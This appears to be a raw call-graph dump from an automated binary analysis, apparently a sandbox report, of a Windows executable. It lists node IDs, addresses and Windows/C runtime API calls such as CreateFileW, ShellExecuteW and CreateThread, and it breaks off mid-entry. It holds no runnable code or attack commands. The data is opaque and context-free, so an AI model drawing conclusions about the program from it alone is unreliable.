98500->98494 98501->98500 98504 7a3fe1 81 API calls __wsopen_s 98501->98504 98502->98500 98502->98501 98503 73bed9 8 API calls 98502->98503 98503->98501 98504->98499 98505 768782 98510 76853e 98505->98510 98508 7687aa 98515 76856f try_get_first_available_module 98510->98515 98512 76876e 98529 762b5c 26 API calls _strftime 98512->98529 98514 7686c3 98514->98508 98522 770d04 98514->98522 98515->98515 98518 7686b8 98515->98518 98525 75917b 40 API calls 2 library calls 98515->98525 98517 76870c 98517->98518 98526 75917b 40 API calls 2 library calls 98517->98526 98518->98514 98528 75f649 20 API calls _free 98518->98528 98520 76872b 98520->98518 98527 75917b 40 API calls 2 library calls 98520->98527 98530 770401 98522->98530 98524 770d1f 98524->98508 98525->98517 98526->98520 98527->98518 98528->98512 98529->98514 98532 77040d ___BuildCatchObject 98530->98532 98531 77041b 98588 75f649 20 API calls _free 98531->98588 98532->98531 98534 770454 98532->98534 98541 7709db 98534->98541 98535 770420 98589 762b5c 26 API calls _strftime 98535->98589 98540 77042a __fread_nolock 98540->98524 98591 7707af 98541->98591 98544 770a26 98609 765594 98544->98609 98545 770a0d 98623 75f636 20 API calls _free 98545->98623 98548 770a12 98624 75f649 20 API calls _free 98548->98624 98549 770a2b 98550 770a34 98549->98550 98551 770a4b 98549->98551 98625 75f636 20 API calls _free 98550->98625 98622 77071a CreateFileW 98551->98622 98555 770a39 98626 75f649 20 API calls _free 98555->98626 98557 770b01 GetFileType 98559 770b53 98557->98559 98560 770b0c GetLastError 98557->98560 98558 770ad6 GetLastError 98628 75f613 20 API calls 2 library calls 98558->98628 98631 7654dd 21 API calls 3 library calls 98559->98631 98629 75f613 20 API calls 2 library calls 98560->98629 98561 770a84 98561->98557 98561->98558 98627 77071a CreateFileW 98561->98627 98564 770b1a CloseHandle 98564->98548 98566 770b43 98564->98566 98630 75f649 20 API calls _free 98566->98630 98568 770ac9 98568->98557 98568->98558 98570 770b74 98572 770bc0 98570->98572 98632 77092b 72 API calls 4 library calls 98570->98632 98571 770b48 98571->98548 98577 770bed 98572->98577 98633 7704cd 72 API calls 4 library calls 98572->98633 98575 770be6 98576 770bfe 98575->98576 98575->98577 98579 770478 98576->98579 98580 770c7c CloseHandle 98576->98580 98634 768a2e 98577->98634 98590 7704a1 LeaveCriticalSection __wsopen_s 98579->98590 98649 77071a CreateFileW 98580->98649 98582 770ca7 98583 770cdd 98582->98583 98584 770cb1 GetLastError 98582->98584 98583->98579 98650 75f613 20 API calls 2 library calls 98584->98650 98586 770cbd 98651 7656a6 21 API calls 3 library calls 98586->98651 98588->98535 98589->98540 98590->98540 98592 7707ea 98591->98592 98593 7707d0 98591->98593 98652 77073f 98592->98652 98593->98592 98659 75f649 20 API calls _free 98593->98659 98596 770822 98599 770851 98596->98599 98661 75f649 20 API calls _free 98596->98661 98597 7707df 98660 762b5c 26 API calls _strftime 98597->98660 98607 7708a4 98599->98607 98663 75da7d 26 API calls 2 library calls 98599->98663 98602 77089f 98604 77091e 98602->98604 98602->98607 98603 770846 98662 762b5c 26 API calls _strftime 98603->98662 98664 762b6c 11 API calls _abort 98604->98664 98607->98544 98607->98545 98608 77092a 98610 7655a0 ___BuildCatchObject 98609->98610 98667 7632d1 EnterCriticalSection 98610->98667 98612 7655cc 98671 765373 21 API calls 3 library calls 98612->98671 98615 765617 __fread_nolock 98615->98549 98616 7655a7 98616->98612 98618 76563a EnterCriticalSection 98616->98618 98620 7655ee 98616->98620 98617 7655d1 98617->98620 98672 7654ba EnterCriticalSection 98617->98672 98619 765647 LeaveCriticalSection 98618->98619 98618->98620 98619->98616 98668 76569d 98620->98668 98622->98561 98623->98548 98624->98579 98625->98555 98626->98548 98627->98568 98628->98548 98629->98564 98630->98571 98631->98570 98632->98572 98633->98575 98635 765737 __wsopen_s 26 API calls 98634->98635 98638 768a3e 98635->98638 98636 768a44 98674 7656a6 21 API calls 3 library calls 98636->98674 98638->98636 98639 768a76 98638->98639 98642 765737 __wsopen_s 26 API calls 98638->98642 98639->98636 98640 765737 __wsopen_s 26 API calls 98639->98640 98643 768a82 FindCloseChangeNotification 98640->98643 98641 768a9c 98644 768abe 98641->98644 98675 75f613 20 API calls 2 library calls 98641->98675 98645 768a6d 98642->98645 98643->98636 98646 768a8e GetLastError 98643->98646 98644->98579 98648 765737 __wsopen_s 26 API calls 98645->98648 98646->98636 98648->98639 98649->98582 98650->98586 98651->98583 98655 770757 98652->98655 98653 770772 98653->98596 98655->98653 98665 75f649 20 API calls _free 98655->98665 98656 770796 98666 762b5c 26 API calls _strftime 98656->98666 98658 7707a1 98658->98596 98659->98597 98660->98592 98661->98603 98662->98599 98663->98602 98664->98608 98665->98656 98666->98658 98667->98616 98673 763319 LeaveCriticalSection 98668->98673 98670 7656a4 98670->98615 98671->98617 98672->98620 98673->98670 98674->98641 98675->98644 98676 772782 98679 732ab0 98676->98679 98680 732aef mciSendStringW 98679->98680 98681 773a1a DestroyWindow 98679->98681 98682 732d66 98680->98682 98683 732b0b 98680->98683 98692 773a26 98681->98692 98682->98683 98685 732d75 UnregisterHotKey 98682->98685 98684 732b19 98683->98684 98683->98692 98713 732ede 98684->98713 98685->98682 98687 773a6b 98693 773a8f 98687->98693 98694 773a7e FreeLibrary 98687->98694 98688 773a44 FindClose 98688->98692 98691 732b2e 98691->98693 98699 732b3c 98691->98699 98692->98687 98692->98688 98719 737aab 98692->98719 98695 773aa3 VirtualFree 98693->98695 98702 732ba9 98693->98702 98694->98687 98695->98693 98696 732b98 OleUninitialize 98696->98702 98697 732bb4 98701 732bc4 98697->98701 98698 773aeb 98706 773afa messages 98698->98706 98723 7a3d30 6 API calls messages 98698->98723 98699->98696 98717 732ff4 10 API calls 98701->98717 98702->98697 98702->98698 98704 732bda 98718 732e1c 8 API calls 98704->98718 98709 773b89 98706->98709 98724 796e3b 8 API calls messages 98706->98724 98709->98709 98715 732eeb 98713->98715 98714 732b20 98714->98687 98714->98691 98715->98714 98725 797991 8 API calls 98715->98725 98717->98704 98720 737ab5 98719->98720 98721 737ac4 98719->98721 98720->98692 98721->98720 98722 737ac9 CloseHandle 98721->98722 98722->98720 98723->98698 98724->98706 98725->98715 98726 731044 98731 732793 98726->98731 98728 73104a 98767 750413 29 API calls __onexit 98728->98767 98730 731054 98768 732a38 98731->98768 98735 73280a 98736 73bf73 8 API calls 98735->98736 98737 732814 98736->98737 98738 73bf73 8 API calls 98737->98738 98739 73281e 98738->98739 98740 73bf73 8 API calls 98739->98740 98741 732828 98740->98741 98742 73bf73 8 API calls 98741->98742 98743 732866 98742->98743 98744 73bf73 8 API calls 98743->98744 98745 732932 98744->98745 98778 732dbc 98745->98778 98749 732964 98750 73bf73 8 API calls 98749->98750 98751 73296e 98750->98751 98752 743160 9 API calls 98751->98752 98753 732999 98752->98753 98805 733166 98753->98805 98755 7329b5 98756 7329c5 GetStdHandle 98755->98756 98757 7739e7 98756->98757 98758 732a1a 98756->98758 98757->98758 98759 7739f0 98757->98759 98761 732a27 OleInitialize 98758->98761 98760 75014b 8 API calls 98759->98760 98762 7739f7 98760->98762 98761->98728 98812 7a0ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98762->98812 98764 773a00 98813 7a12eb CreateThread 98764->98813 98766 773a0c CloseHandle 98766->98758 98767->98730 98814 732a91 98768->98814 98771 732a91 8 API calls 98772 732a70 98771->98772 98773 73bf73 8 API calls 98772->98773 98774 732a7c 98773->98774 98775 738577 8 API calls 98774->98775 98776 7327c9 98775->98776 98777 73327e 6 API calls 98776->98777 98777->98735 98779 73bf73 8 API calls 98778->98779 98780 732dcc 98779->98780 98781 73bf73 8 API calls 98780->98781 98782 732dd4 98781->98782 98821 7381d6 98782->98821 98785 7381d6 8 API calls 98786 732de4 98785->98786 98787 73bf73 8 API calls 98786->98787 98788 732def 98787->98788 98789 75014b 8 API calls 98788->98789 98790 73293c 98789->98790 98791 733205 98790->98791 98792 733213 98791->98792 98793 73bf73 8 API calls 98792->98793 98794 73321e 98793->98794 98795 73bf73 8 API calls 98794->98795 98796 733229 98795->98796 98797 73bf73 8 API calls 98796->98797 98798 733234 98797->98798 98799 73bf73 8 API calls 98798->98799 98800 73323f 98799->98800 98801 7381d6 8 API calls 98800->98801 98802 73324a 98801->98802 98803 75014b 8 API calls 98802->98803 98804 733251 RegisterWindowMessageW 98803->98804 98804->98749 98806 733176 98805->98806 98807 773c8f 98805->98807 98808 75014b 8 API calls 98806->98808 98824 7a3c4e 8 API calls 98807->98824 98810 73317e 98808->98810 98810->98755 98811 773c9a 98812->98764 98813->98766 98825 7a12d1 14 API calls 98813->98825 98815 73bf73 8 API calls 98814->98815 98816 732a9c 98815->98816 98817 73bf73 8 API calls 98816->98817 98818 732aa4 98817->98818 98819 73bf73 8 API calls 98818->98819 98820 732a66 98819->98820 98820->98771 98822 73bf73 8 API calls 98821->98822 98823 732ddc 98822->98823 98823->98785 98824->98811 98826 74f9a3 98827 74f9ad 98826->98827 98828 74f9ce 98826->98828 98829 73c3ab 8 API calls 98827->98829 98834 78fb3c 98828->98834 98835 7956ae 8 API calls messages 98828->98835 98830 74f9bd 98829->98830 98832 73c3ab 8 API calls 98830->98832 98833 74f9cd 98832->98833 98835->98828 98836 75f06e 98837 75f07a ___BuildCatchObject 98836->98837 98838 75f086 98837->98838 98839 75f09b 98837->98839 98855 75f649 20 API calls _free 98838->98855 98849 7594fd EnterCriticalSection 98839->98849 98842 75f08b 98856 762b5c 26 API calls _strftime 98842->98856 98843 75f0a7 98850 75f0db 98843->98850 98848 75f096 __fread_nolock 98849->98843 98858 75f106 98850->98858 98852 75f0e8 98853 75f0b4 98852->98853 98878 75f649 20 API calls _free 98852->98878 98857 75f0d1 LeaveCriticalSection __fread_nolock 98853->98857 98855->98842 98856->98848 98857->98848 98859 75f114 98858->98859 98860 75f12e 98858->98860 98882 75f649 20 API calls _free 98859->98882 98862 75dcc5 __fread_nolock 26 API calls 98860->98862 98864 75f137 98862->98864 98863 75f119 98883 762b5c 26 API calls _strftime 98863->98883 98879 769789 98864->98879 98868 75f1bf 98872 75f1dc 98868->98872 98877 75f1ee 98868->98877 98869 75f23b 98870 75f248 98869->98870 98869->98877 98885 75f649 20 API calls _free 98870->98885 98884 75f41f 31 API calls 4 library calls 98872->98884 98874 75f1e6 98875 75f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 98874->98875 98875->98852 98877->98875 98886 75f29b 30 API calls 2 library calls 98877->98886 98878->98853 98887 769606 98879->98887 98881 75f153 98881->98868 98881->98869 98881->98875 98882->98863 98883->98875 98884->98874 98885->98875 98886->98875 98888 769612 ___BuildCatchObject 98887->98888 98889 769632 98888->98889 98890 76961a 98888->98890 98892 7696e6 98889->98892 98897 76966a 98889->98897 98913 75f636 20 API calls _free 98890->98913 98918 75f636 20 API calls _free 98892->98918 98893 76961f 98914 75f649 20 API calls _free 98893->98914 98896 7696eb 98919 75f649 20 API calls _free 98896->98919 98912 7654ba EnterCriticalSection 98897->98912 98900 7696f3 98920 762b5c 26 API calls _strftime 98900->98920 98901 769670 98903 769694 98901->98903 98904 7696a9 98901->98904 98915 75f649 20 API calls _free 98903->98915 98907 76970b __fread_nolock 28 API calls 98904->98907 98906 769627 __fread_nolock 98906->98881 98909 7696a4 98907->98909 98908 769699 98916 75f636 20 API calls _free 98908->98916 98917 7696de LeaveCriticalSection __wsopen_s 98909->98917 98912->98901 98913->98893 98914->98906 98915->98908 98916->98909 98917->98906 98918->98896 98919->98900 98920->98906 98921 75076b 98922 750777 ___BuildCatchObject 98921->98922 98951 750221 98922->98951 98924 7508d1 98992 750baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98924->98992 98925 75077e 98925->98924 98928 7507a8 98925->98928 98927 7508d8 98985 7551c2 98927->98985 98938 7507e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98928->98938 98962 7627ed 98928->98962 98935 7507c7 98937 750848 98970 750cc9 98937->98970 98938->98937 98988 75518a 38 API calls 3 library calls 98938->98988 98940 75084e 98974 73331b 98940->98974 98945 75086a 98945->98927 98946 75086e 98945->98946 98947 750877 98946->98947 98990 755165 28 API calls _abort 98946->98990 98991 7503b0 13 API calls 2 library calls 98947->98991 98950 75087f 98950->98935 98952 75022a 98951->98952 98994 750a08 IsProcessorFeaturePresent 98952->98994 98954 750236 98995 753004 10 API calls 3 library calls 98954->98995 98956 75023b 98961 75023f 98956->98961 98996 762687 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98956->98996 98958 750248 98959 750256 98958->98959 98997 75302d 8 API calls 3 library calls 98958->98997 98959->98925 98961->98925 98964 762804 98962->98964 98998 750dfc 98964->98998 98965 7507c1 98965->98935 98966 762791 98965->98966 98967 7627c0 98966->98967 98968 750dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 98967->98968 98969 7627e9 98968->98969 98969->98938 99006 7526b0 98970->99006 98973 750cef 98973->98940 98975 733327 IsThemeActive 98974->98975 98976 733382 98974->98976 99008 7552b3 98975->99008 98989 750d02 GetModuleHandleW 98976->98989 98978 733352 99014 755319 98978->99014 98980 733359 99021 7332e6 SystemParametersInfoW SystemParametersInfoW 98980->99021 98982 733360 99022 73338b 98982->99022 98984 733368 SystemParametersInfoW 98984->98976 99779 754f3f 98985->99779 98988->98937 98989->98945 98990->98947 98991->98950 98992->98927 98994->98954 98995->98956 98996->98958 98997->98961 98999 750e05 98998->98999 99000 750e07 IsProcessorFeaturePresent 98998->99000 98999->98965 99002 750fce 99000->99002 99005 750f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99002->99005 99004 7510b1 99004->98965 99005->99004 99007 750cdc GetStartupInfoW 99006->99007 99007->98973 99009 7552bf ___BuildCatchObject 99008->99009 99071 7632d1 EnterCriticalSection 99009->99071 99011 7552ca pre_c_initialization 99072 75530a 99011->99072 99013 7552ff __fread_nolock 99013->98978 99015 755325 99014->99015 99016 75533f 99014->99016 99015->99016 99076 75f649 20 API calls _free 99015->99076 99016->98980 99018 75532f 99077 762b5c 26 API calls _strftime 99018->99077 99020 75533a 99020->98980 99021->98982 99023 73339b __wsopen_s 99022->99023 99024 73bf73 8 API calls 99023->99024 99025 7333a7 GetCurrentDirectoryW 99024->99025 99078 734fd9 99025->99078 99027 7333ce IsDebuggerPresent 99028 773ca3 MessageBoxA 99027->99028 99029 7333dc 99027->99029 99031 773cbb 99028->99031 99030 7333f0 99029->99030 99029->99031 99146 733a95 99030->99146 99182 734176 8 API calls 99031->99182 99039 733462 99040 773cec SetCurrentDirectoryW 99039->99040 99041 73346a 99039->99041 99040->99041 99042 733475 99041->99042 99183 791fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 99041->99183 99178 7334d3 7 API calls 99042->99178 99045 773d07 99045->99042 99048 773d19 99045->99048 99050 735594 10 API calls 99048->99050 99049 73347f 99052 73396b 60 API calls 99049->99052 99055 733494 99049->99055 99051 773d22 99050->99051 99053 73b329 8 API calls 99051->99053 99052->99055 99054 773d30 99053->99054 99057 773d5f 99054->99057 99058 773d38 99054->99058 99056 7334af 99055->99056 99059 733907 Shell_NotifyIconW 99055->99059 99060 7334b6 SetCurrentDirectoryW 99056->99060 99061 736b7c 8 API calls 99057->99061 99062 736b7c 8 API calls 99058->99062 99059->99056 99063 7334ca 99060->99063 99064 773d5b GetForegroundWindow ShellExecuteW 99061->99064 99065 773d43 99062->99065 99063->98984 99068 773d90 99064->99068 99184 737bb5 8 API calls 99065->99184 99068->99056 99069 773d51 99070 736b7c 8 API calls 99069->99070 99070->99064 99071->99011 99075 763319 LeaveCriticalSection 99072->99075 99074 755311 99074->99013 99075->99074 99076->99018 99077->99020 99079 73bf73 8 API calls 99078->99079 99080 734fef 99079->99080 99185 7363d7 99080->99185 99082 73500d 99083 73bd57 8 API calls 99082->99083 99084 735021 99083->99084 99085 73bed9 8 API calls 99084->99085 99086 73502c 99085->99086 99199 73893c 99086->99199 99089 73b329 8 API calls 99090 735045 99089->99090 99091 73be2d 39 API calls 99090->99091 99092 735055 99091->99092 99093 73b329 8 API calls 99092->99093 99094 73507b 99093->99094 99095 73be2d 39 API calls 99094->99095 99096 73508a 99095->99096 99097 73bf73 8 API calls 99096->99097 99098 7350a8 99097->99098 99202 7351ca 99098->99202 99101 754d98 _strftime 40 API calls 99102 7350c2 99101->99102 99103 774b23 99102->99103 99104 7350cc 99102->99104 99105 7351ca 8 API calls 99103->99105 99106 754d98 _strftime 40 API calls 99104->99106 99108 774b37 99105->99108 99107 7350d7 99106->99107 99107->99108 99109 7350e1 99107->99109 99111 7351ca 8 API calls 99108->99111 99110 754d98 _strftime 40 API calls 99109->99110 99112 7350ec 99110->99112 99113 774b53 99111->99113 99112->99113 99114 7350f6 99112->99114 99116 735594 10 API calls 99113->99116 99115 754d98 _strftime 40 API calls 99114->99115 99118 735101 99115->99118 99117 774b76 99116->99117 99119 7351ca 8 API calls 99117->99119 99120 774b9f 99118->99120 99121 73510b 99118->99121 99122 774b82 99119->99122 99124 7351ca 8 API calls 99120->99124 99123 73512e 99121->99123 99126 73bed9 8 API calls 99121->99126 99125 73bed9 8 API calls 99122->99125 99128 774bda 99123->99128 99132 737e12 8 API calls 99123->99132 99127 774bbd 99124->99127 99129 774b90 99125->99129 99130 735121 99126->99130 99131 73bed9 8 API calls 99127->99131 99133 7351ca 8 API calls 99129->99133 99134 7351ca 8 API calls 99130->99134 99135 774bcb 99131->99135 99136 73513e 99132->99136 99133->99120 99134->99123 99138 7351ca 8 API calls 99135->99138 99137 738470 8 API calls 99136->99137 99139 73514c 99137->99139 99138->99128 99208 738a60 99139->99208 99141 73893c 8 API calls 99143 735167 99141->99143 99142 738a60 8 API calls 99142->99143 99143->99141 99143->99142 99144 7351ab 99143->99144 99145 7351ca 8 API calls 99143->99145 99144->99027 99145->99143 99147 733aa2 __wsopen_s 99146->99147 99148 733abb 99147->99148 99149 7740da ___scrt_fastfail 99147->99149 99150 735851 9 API calls 99148->99150 99151 7740f6 GetOpenFileNameW 99149->99151 99152 733ac4 99150->99152 99154 774145 99151->99154 99220 733a57 99152->99220 99156 738577 8 API calls 99154->99156 99158 77415a 99156->99158 99158->99158 99159 733ad9 99238 7362d5 99159->99238 99778 733624 7 API calls 99178->99778 99180 73347a 99181 7335b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99180->99181 99181->99049 99182->99039 99183->99045 99184->99069 99186 7363e4 __wsopen_s 99185->99186 99187 738577 8 API calls 99186->99187 99188 736416 99186->99188 99187->99188 99189 73655e 8 API calls 99188->99189 99197 73644c 99188->99197 99189->99188 99190 73b329 8 API calls 99191 736543 99190->99191 99193 736a7c 8 API calls 99191->99193 99192 73b329 8 API calls 99192->99197 99195 73654f 99193->99195 99194 73655e 8 API calls 99194->99197 99195->99082 99196 736a7c 8 API calls 99196->99197 99197->99192 99197->99194 99197->99196 99198 73651a 99197->99198 99198->99190 99198->99195 99200 75014b 8 API calls 99199->99200 99201 735038 99200->99201 99201->99089 99203 7351f2 99202->99203 99204 7351d4 99202->99204 99205 738577 8 API calls 99203->99205 99206 73bed9 8 API calls 99204->99206 99207 7350b4 99204->99207 99205->99207 99206->99207 99207->99101 99209 738a76 99208->99209 99210 776737 99209->99210 99215 738a80 99209->99215 99219 74b7a2 8 API calls 99210->99219 99212 776744 99213 73b4c8 8 API calls 99212->99213 99214 776762 99213->99214 99214->99214 99215->99212 99216 738b94 99215->99216 99218 738b9b 99215->99218 99217 75014b 8 API calls 99216->99217 99217->99218 99218->99143 99219->99212 99221 7722d0 __wsopen_s 99220->99221 99222 733a64 GetLongPathNameW 99221->99222 99223 738577 8 API calls 99222->99223 99224 733a8c 99223->99224 99225 7353f2 99224->99225 99226 73bf73 8 API calls 99225->99226 99227 735404 99226->99227 99228 735851 9 API calls 99227->99228 99229 73540f 99228->99229 99230 73541a 99229->99230 99233 774d5b 99229->99233 99232 736a7c 8 API calls 99230->99232 99234 735426 99232->99234 99235 774d7d 99233->99235 99274 74e36b 41 API calls 99233->99274 99268 731340 99234->99268 99237 735439 99237->99159 99275 736679 99238->99275 99241 775336 99400 7a36b8 99241->99400 99243 736679 93 API calls 99244 73630e 99243->99244 99244->99241 99246 736316 99244->99246 99245 775347 99247 77534b 99245->99247 99248 775368 99245->99248 99249 736322 99246->99249 99250 775353 99246->99250 99439 7366e7 99247->99439 99252 75017b 8 API calls 99248->99252 99297 733b39 99249->99297 99445 79e30e 82 API calls 99250->99445 99258 7753ad 99252->99258 99256 775361 99256->99248 99257 77555e 99260 775566 99257->99260 99258->99257 99258->99260 99265 73b329 8 API calls 99258->99265 99422 799ff8 99258->99422 99425 73bba9 99258->99425 99433 735d21 99258->99433 99446 799f27 41 API calls _wcslen 99258->99446 99447 7a1519 8 API calls 99258->99447 99259 7366e7 68 API calls 99259->99260 99260->99259 99448 79a215 81 API calls __wsopen_s 99260->99448 99265->99258 99269 731352 99268->99269 99273 731371 __fread_nolock 99268->99273 99272 75017b 8 API calls 99269->99272 99270 75014b 8 API calls 99271 731388 99270->99271 99271->99237 99272->99273 99273->99270 99274->99233 99449 73663e LoadLibraryA 99275->99449 99280 7366a4 LoadLibraryExW 99457 736607 LoadLibraryA 99280->99457 99281 775648 99283 7366e7 68 API calls 99281->99283 99284 77564f 99283->99284 99286 736607 3 API calls 99284->99286 99288 775657 99286->99288 99478 73684a 99288->99478 99289 7366ce 99289->99288 99290 7366da 99289->99290 99292 7366e7 68 API calls 99290->99292 99294 7362fa 99292->99294 99294->99241 99294->99243 99296 77567e 99298 733b62 99297->99298 99299 77415f 99297->99299 99301 75017b 8 API calls 99298->99301 99657 79a215 81 API calls __wsopen_s 99299->99657 99302 733b86 99301->99302 99303 737aab CloseHandle 99302->99303 99304 733b94 99303->99304 99305 73bf73 8 API calls 99304->99305 99308 733b9d 99305->99308 99306 733bfa 99309 73bf73 8 API calls 99306->99309 99307 733bec 99307->99306 99310 774179 99307->99310 99658 79d5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 99307->99658 99311 737aab CloseHandle 99308->99311 99312 733c06 99309->99312 99310->99306 99310->99307 99313 733ba6 99311->99313 99632 733ae9 99312->99632 99316 737aab CloseHandle 99313->99316 99319 733baf 99316->99319 99317 7741d5 99317->99306 99646 736fa2 SetFilePointerEx SetFilePointerEx SetFilePointerEx CreateFileW CreateFileW 99319->99646 99320 73bf73 8 API calls 99401 7a36d4 99400->99401 99402 736874 64 API calls 99401->99402 99403 7a36e8 99402->99403 99676 7a3827 99403->99676 99406 73684a 40 API calls 99407 7a3717 99406->99407 99408 73684a 40 API calls 99407->99408 99409 7a3727 99408->99409 99410 73684a 40 API calls 99409->99410 99411 7a3742 99410->99411 99412 73684a 40 API calls 99411->99412 99413 7a375d 99412->99413 99414 736874 64 API calls 99413->99414 99415 7a3774 ___std_exception_copy 99414->99415 99420 7a3700 99420->99245 99423 75017b 8 API calls 99422->99423 99424 79a028 __fread_nolock 99423->99424 99424->99258 99427 73bc33 99425->99427 99430 73bbb9 __fread_nolock 99425->99430 99426 75014b 8 API calls 99428 73bbc0 99426->99428 99429 75017b 8 API calls 99427->99429 99431 75014b 8 API calls 99428->99431 99432 73bbde 99428->99432 99429->99430 99430->99426 99431->99432 99432->99258 99434 735d34 99433->99434 99436 735dd8 99433->99436 99435 75017b 8 API calls 99434->99435 99437 735d66 99434->99437 99435->99437 99436->99258 99437->99436 99438 75014b 8 API calls 99437->99438 99438->99437 99440 7366f1 99439->99440 99441 7366f8 99439->99441 99683 75e9e8 99440->99683 99443 7756a4 FreeLibrary 99441->99443 99444 73670f 99441->99444 99444->99250 99445->99256 99446->99258 99447->99258 99448->99260 99450 736656 GetProcAddress 99449->99450 99451 736674 99449->99451 99452 736666 99450->99452 99454 75e95b 99451->99454 99452->99451 99453 73666d FreeLibrary 99452->99453 99453->99451 99486 75e89a 99454->99486 99456 736698 99456->99280 99456->99281 99458 73663b 99457->99458 99459 73661c GetProcAddress 99457->99459 99462 736720 99458->99462 99460 73662c 99459->99460 99460->99458 99461 736634 FreeLibrary 99460->99461 99461->99458 99463 75017b 8 API calls 99462->99463 99464 736735 99463->99464 99465 73423c 8 API calls 99464->99465 99467 736741 __fread_nolock 99465->99467 99466 7756c2 99546 7a3a92 74 API calls 99466->99546 99467->99466 99471 73677c 99467->99471 99545 7a3a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99467->99545 99470 73684a 40 API calls 99470->99471 99471->99470 99473 736810 messages 99471->99473 99474 775706 99471->99474 99475 736874 64 API calls 99471->99475 99473->99289 99540 736874 99474->99540 99475->99471 99477 73684a 40 API calls 99477->99473 99479 775760 99478->99479 99480 73685c 99478->99480 99578 75ec34 99480->99578 99483 7a32bd 99615 7a310d 99483->99615 99485 7a32d8 99485->99296 99489 75e8a6 ___BuildCatchObject 99486->99489 99487 75e8b4 99511 75f649 20 API calls _free 99487->99511 99489->99487 99491 75e8e4 99489->99491 99490 75e8b9 99512 762b5c 26 API calls _strftime 99490->99512 99493 75e8f6 99491->99493 99494 75e8e9 99491->99494 99503 7683e1 99493->99503 99513 75f649 20 API calls _free 99494->99513 99497 75e8ff 99498 75e905 99497->99498 99499 75e912 99497->99499 99514 75f649 20 API calls _free 99498->99514 99515 75e944 LeaveCriticalSection __fread_nolock 99499->99515 99501 75e8c4 __fread_nolock 99501->99456 99504 7683ed ___BuildCatchObject 99503->99504 99516 7632d1 EnterCriticalSection 99504->99516 99506 7683fb 99517 76847b 99506->99517 99510 76842c __fread_nolock 99510->99497 99511->99490 99512->99501 99513->99501 99514->99501 99515->99501 99516->99506 99526 76849e 99517->99526 99518 7684f7 99536 764ff0 20 API calls 2 library calls 99518->99536 99519 768408 99531 768437 99519->99531 99521 768500 99523 762d38 _free 20 API calls 99521->99523 99524 768509 99523->99524 99524->99519 99537 763778 11 API calls 2 library calls 99524->99537 99526->99518 99526->99519 99534 7594fd EnterCriticalSection 99526->99534 99535 759511 LeaveCriticalSection 99526->99535 99527 768528 99538 7594fd EnterCriticalSection 99527->99538 99530 76853b 99530->99519 99539 763319 LeaveCriticalSection 99531->99539 99533 76843e 99533->99510 99534->99526 99535->99526 99536->99521 99537->99527 99538->99530 99539->99533 99541 736883 99540->99541 99542 775780 99540->99542 99547 75f053 99541->99547 99545->99466 99546->99471 99550 75ee1a 99547->99550 99549 736891 99549->99477 99553 75ee26 ___BuildCatchObject 99550->99553 99551 75ee32 99575 75f649 20 API calls _free 99551->99575 99553->99551 99554 75ee58 99553->99554 99563 7594fd EnterCriticalSection 99554->99563 99556 75ee37 99576 762b5c 26 API calls _strftime 99556->99576 99557 75ee64 99564 75ef7a 99557->99564 99560 75ee78 99577 75ee97 LeaveCriticalSection __fread_nolock 99560->99577 99562 75ee42 __fread_nolock 99562->99549 99563->99557 99565 75ef9c 99564->99565 99566 75ef8c 99564->99566 99568 75eea1 28 API calls 99565->99568 99567 75f649 _free 20 API calls 99566->99567 99569 75ef91 99567->99569 99571 75efbf 99568->99571 99569->99560 99570 75f03e 99570->99560 99571->99570 99572 75df7b 62 API calls 99571->99572 99573 75efe6 99572->99573 99574 7697a4 __fread_nolock 28 API calls 99573->99574 99574->99570 99575->99556 99576->99562 99577->99562 99581 75ec51 99578->99581 99580 73686d 99580->99483 99582 75ec5d ___BuildCatchObject 99581->99582 99583 75ec70 ___scrt_fastfail 99582->99583 99584 75ec9d 99582->99584 99585 75ec95 __fread_nolock 99582->99585 99608 75f649 20 API calls _free 99583->99608 99594 7594fd EnterCriticalSection 99584->99594 99585->99580 99587 75eca7 99595 75ea68 99587->99595 99590 75ec8a 99609 762b5c 26 API calls _strftime 99590->99609 99594->99587 99598 75ea7a ___scrt_fastfail 99595->99598 99601 75ea97 99595->99601 99596 75ea87 99611 75f649 20 API calls _free 99596->99611 99598->99596 99598->99601 99604 75eada __fread_nolock 99598->99604 99599 75ea8c 99612 762b5c 26 API calls _strftime 99599->99612 99610 75ecdc LeaveCriticalSection __fread_nolock 99601->99610 99602 75ebf6 ___scrt_fastfail 99614 75f649 20 API calls _free 99602->99614 99604->99601 99604->99602 99605 75dcc5 __fread_nolock 26 API calls 99604->99605 99607 7690c5 __fread_nolock 38 API calls 99604->99607 99613 75d2e8 26 API calls 4 library calls 99604->99613 99605->99604 99607->99604 99608->99590 99609->99585 99610->99585 99611->99599 99612->99601 99613->99604 99614->99599 99618 75e858 99615->99618 99617 7a311c 99617->99485 99621 75e7d9 99618->99621 99620 75e875 99620->99617 99622 75e7fc 99621->99622 99623 75e7e8 99621->99623 99628 75e7f8 __alldvrm 99622->99628 99631 7636b2 11 API calls 2 library calls 99622->99631 99629 75f649 20 API calls _free 99623->99629 99626 75e7ed 99630 762b5c 26 API calls _strftime 99626->99630 99628->99620 99629->99626 99630->99628 99631->99628 99633 7722d0 __wsopen_s 99632->99633 99634 733af6 GetCurrentDirectoryW 99633->99634 99635 738577 8 API calls 99634->99635 99636 733b19 99635->99636 99636->99320 99657->99307 99658->99317 99681 7a383b 99676->99681 99677 7a36fc 99677->99406 99677->99420 99678 73684a 40 API calls 99678->99681 99679 7a32bd 27 API calls 99679->99681 99680 736874 64 API calls 99680->99681 99681->99677 99681->99678 99681->99679 99681->99680 99684 75e9f4 ___BuildCatchObject 99683->99684 99685 75ea05 99684->99685 99686 75ea1a 99684->99686 99696 75f649 20 API calls _free 99685->99696 99695 75ea15 __fread_nolock 99686->99695 99698 7594fd EnterCriticalSection 99686->99698 99689 